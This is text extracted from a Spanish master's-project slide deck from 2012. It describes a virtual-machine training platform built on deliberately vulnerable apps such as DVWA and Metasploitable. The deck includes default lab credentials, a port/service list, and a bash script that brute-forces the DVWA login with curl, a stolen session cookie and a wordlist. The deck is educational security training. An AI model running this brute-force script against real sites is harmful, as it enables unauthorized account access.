Proyecto Fin de Máster “Administración, Comunicaciones y Seguridad Informática” Plataforma de Aprendizaje y Entrenamiento Octubre 2012 Carlos Díaz Moñino – [email protected]
Proyecto Fin de Máster
“Administración, Comunicaciones y Seguridad Informática”
Plataforma de Aprendizaje y Entrenamiento
Octubre 2012
Carlos Díaz Moñino – [email protected]
¿Quién es el autor?Formación:
M.C.S.A – Microsoft Certified Systems Administratorhttp://www.microsoft.com/learning/en/us/certification/mcsa.aspx
M.C.S.E – Microsoft Certified Systems Engineerhttp://www.microsoft.com/learning/en/us/certification/mcse.aspx
C.C.N.A – Cisco Certified Network Associatehttp://www.cisco.com/web/learning/le3/le2/le0/le9/learning_certification_type_home.html
C.C.N.P – Cisco Certified Network Professionalhttp://www.cisco.com/web/learning/le3/le2/le37/le10/learning_certification_type_home.html
F.N.S – Fundamental Network Securityhttps://learningnetwork.cisco.com/community/certifications/security_ccna
LPIC-1 – Junior Level Linux Certificationhttp://www.lpi.org/linux-certifications/programs/lpic-1
LPIC-2 – Advanced Level Linux Certification http://www.lpi.org/content/lpic-2
C.E.H – Certified Ethical Hacker http://www.eccouncil.org/courses/certified_ethical_hacker.aspx
Carlos Díaz Moñino – [email protected]
¿Quién es el autor?Formación:
● Máster “Experto en Seguridad, Redes y Telecomunicaciones” (Basado en formación oficial de Fabricantes).
● Asistencia a múltiples conferencias y colaboración activa con varios grupos.
● Diversos cursos presenciales /on-line.
● Muchas horas de auto-formación.
● ¿¿Máster en “Administración, Comunicaciones y Seguridad Informática”?? Universidad de Almería.
Preparando Actualmente:
Grado en CriminologíaCriminología – Orientado al Ciber-Crimen.
C.H.F.I – Computer Hacking Forensic Investigator http://www.eccouncil.org/Computer-Hacking-Forensic-Investigator/index.html
C.I.S.S.P – Certified Information Systems Security Professional https://www.isc2.org/cissp/default.aspx
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Qué es?● Se presenta como Proyecto Final para el Máster
“Administración, Comunicaciones y Seguridad Informática”
● Impartido por diversos docentes y profesionales en la Universidad de Almería. http://masteracsi.ual.es/
● Una vez presentado, el proyecto tendrá continuación y actualizaciones de forma periódica.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Objetivo?● Fomentar el estudio de los sistemas,
comunicaciones y desarrollo desde el punto de vista de la seguridad.
● Dar a conocer herramientas, documentación y fuentes de información.
● Demostrar a unos, que el mundo de la seguridad no es tan fácil y a otros, que no es tan difícil.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Ingredientes?● Búsqueda y Selección.● Pruebas y Testeos.● Documentación.● Mezcla de Diversos proyectos.● Desarrollos propios.● Muchas horas de cocina.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿En qué estado se encuentra?
● Desde el punto de vista de Proyecto (Máster): Finalizado.
● Desde el punto de vista de Proyecto (Comunidad): Podemos estar hablando de una versión 0.5a (alpha).
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Qué integra?● Última versión de Metasploitable (v2.0).
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
● Catálogo de herramientas de la última versión de BackTrack 5 (r3). www.backtrack-linux.org/
● Última versión de DVWA - Damn Vulnerable Web Application (v1.0.7) www.dvwa.co.uk
● Última versión del OWASP Hackademic Challenges Project. (v0.1.1)https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Qué integra?● Última versión de Owasp Mutillidae (v2.1.19)
http://sourceforge.net/projects/mutillidae/files/mutillidae-project/
● Última versión de Owasp VicNum (v1.5) https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project
● Amplio catálogo de exploits.● Amplio catálogo de shells y webshells.● Amplia documentación Legal y Normativa de seguridad.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Qué integra?● Software Vulnerable.● Metodologías.● Conferencias.● Revistas/Colecciones.● Resolución de Retos/Wargames/CTF's.● Otros...
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Qué nos encontraremos en la siguiente actualización?
● Zap-Wave – http://code.google.com/p/zaproxy/
● Ghost – http://www.gh0s7.net/
● OWASP WebGoat https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
● WackoPicko – http://www.aldeid.com/wiki/WackoPicko
● WavSep – https://code.google.com/p/wavsep/
● PuzzleMail – https://code.google.com/p/puzzlemall/
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Qué nos encontraremos en la siguiente actualización?
● BodgeIT – http://code.google.com/p/bodgeit/
● OWASP Insecure Web App Project https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project
● HackME – http://hack.me/
● Exploit-Exercises – http://exploit-exercises.com/
● Actualización de recopilación de resolución de Retos, Wargames y Ctf's.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Qué nos encontraremos en la siguiente actualización?
● Actualización de recopilación de seminarios de seguridad.
● Actualización de exploits.● Actualización de Shells y WebShells.● Documentación especifica.● Otros...
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿En qué formato se presenta?● Se presenta en formato maquina virtual Virtualbox/Vmware.
● Web HTML5 y CSS3.
● No requiere de conexión a Internet.
● Puede utilizarse como máquina atacante o como máquina atacada.
● En futuras versiones se podrá instalar y/o correr como 'live-cd'.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Por dónde se empieza?● Descargar e Instalar VirtualBox:
https://www.virtualbox.org/wiki/Downloads
https://www.virtualbox.org/wiki/Documentation
● Importar el appliance:http://www.virtualbox.org/manual/ch01.html
Sección “Importing and exporting virtual machines”.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Por dónde se empieza?
● Asignar a la máquina los recursos de hardware que se estimen oportunos (no menos de 1Gb de Ram).
● Identificarse en la máquina con los siguientes credenciales: Usuario: 'proyecto' Password: '1234'.
● Asignar direccionamiento.
● Añadir una entrada en el fichero 'hosts' con la relación dirección ip (que se ha establecido) → nombre. http://es.wikipedia.org/wiki/Archivo_hosts
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
¿Por dónde se empieza?● Acceder vía web en el caso de querer acceder al contenido y/o a la parte de
entrenamiento web.
Carlos Díaz Moñino – [email protected]
Plataforma de Aprendizaje y Entrenamiento
A continuación se van a explicar a modo de ejemplo la explotación de una serie de vulnerabilidades:
● Web: (basadas en el software DVWA).● Sistemas: (basadas en metasploitable).
* En futuras versiones, todo el contenido quedará resuelto, explicado y detallado.
Carlos Díaz Moñino – [email protected]
NO se siguen técnicas manuales debido al escaso tiempo de exposición
Damn Vulnerable Web Application (DVWA)
Carlos Díaz Moñino – [email protected]
http://www.dvwa.co.uk/
http://sourceforge.net/projects/dvwa/
Damn Vulnerable Web Application ● Para acceder a la aplicación:
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationCredenciales:
● Usuario: 'admin'
● Password: 'password'
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationLa realización de las pruebas se han desarrollado bajo un entorno inseguro por lo que se recomienda:
Carlos Díaz Moñino – [email protected]
* En próximas versiones se solucionaran todas las vulnerabilidades con distintos niveles de seguridad.
Damn Vulnerable Web Application
Vulnerability: Brute Force
Ruta: HOST/dvwa/vulnerabilities/brute/
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Brute Force
● Obtener la cookie de sesión:
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Brute Force
Para obtener la cookie también se puede utilizar cualquier software que intercepte las peticiones, es decir, que actúe como proxy.
TamperData, BurpSuite, AndiParos... O mi favorito: “ZAP” – OWASP Zed Attack Proxyhttps://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web Application
Vulnerability: Brute Force● Diccionario de ejemplo:
– uno
– dos
– admin
– password
– tres
– cuatro Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Brute Force
● Script para automatizar la fuerza bruta:
Carlos Díaz Moñino – [email protected]
#!/bin/bash#Script creado para la resolución de la prueba de fuerza bruta del Damn Web Vulnerable
echo "Introduce la IP del DamnWebVulnerable:"read ip
echo "Introduce la cookie:"read cookie
echo "Introduce el nombre de usuario"read nom_usu
echo "Introduce la ruta del diccionario"read ruta_diccio
echoechoecho "Haciendo Fuerza Bruta al DamnWebVulnerable montado sobre la dirección ip: $ip"echo "Utilizando la cookie: $cookie"echo "Utilizando el diccionario: $ruta_diccio"for i in `cat $ruta_diccio`;do echo -e "\n\nProbando usuario: $nom_usu y Password: $i"; curl -s --user-agent "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1" --cookie "$cookie" --url "http://$ip/dvwa/vulnerabilities/brute/?username=$nom_usu&password=$i&Login=Login" | grep Welcome | cut -d '<' -f2 | cut -d '>' -f 2; done
#Carlos Díaz Moñino - [email protected]
Damn Vulnerable Web Application
Resultado → Usuario: 'admin' – Password: 'password'
Vulnerability: Brute Force
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Command Execution
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Command Execution
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Command Execution
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Command Execution
● Ponemos a la escucha:
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Command Execution
● Conexión al socket & Inyección:
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Reflected Cross Site Scripting (XSS)
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Reflected Cross Site Scripting (XSS)
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: Reflected Cross Site Scripting (XSS)
Carlos Díaz Moñino – [email protected]ón
Damn Vulnerable Web ApplicationVulnerability: Reflected Cross Site Scripting (XSS)
Carlos Díaz Moñino – [email protected]
Inyección
Damn Vulnerable Web ApplicationVulnerability: SQL Injection
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web Application
Comando Carlos Díaz Moñino – [email protected]
Vulnerability: SQL Injection
Damn Vulnerable Web ApplicationVulnerability: SQL Injection
Carlos Díaz Moñino – [email protected]
Damn Vulnerable Web ApplicationVulnerability: SQL Injection
Carlos Díaz Moñino – [email protected]
MetasploitableMetasploit Unleashed
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
http://www.metasploit.com/
Carlos Díaz Moñino – [email protected]
MetasploitableMetasploit Unleashed
* Si el tiempo lo permite, se hará una demostración en directo de como 'ownear' una máquina de forma remota, aprovechando distintas vulnerabilidades.
● Lista de servicios:PUERTO ESTADO SERVICIO21/tcp abierto ftp22/tcp abierto ssh23/tcp abierto telnet25/tcp abierto smtp53/tcp abierto domain80/tcp abierto http99/tcp abierto metagram111/tcp abierto rpcbind139/tcp abierto netbios-ssn445/tcp abierto microsoft-ds512/tcp abierto exec513/tcp abierto login
PUERTO ESTADO SERVICIO514/tcp abierto shell953/tcp abierto rndc1524/tcp abierto ingreslock2049/tcp abierto nfs2121/tcp abierto ccproxy-ftp3306/tcp abierto mysql3632/tcp abierto distccd5432/tcp abierto postgres5900/tcp abierto vnc6000/tcp abierto X116667/tcp abierto irc8009/tcp abierto ajp13
¡Nota!
● Falta mucho contenido de apoyo, (documentación de conferencias, vídeos, documentales, documentación) que se ha tenido que suprimir temporalmente debido al excesivo tamaño de la máquina.
● Una vez presentado el proyecto y se ubique en un servidor con mayor capacidad, se irá actualizando de forma periódica.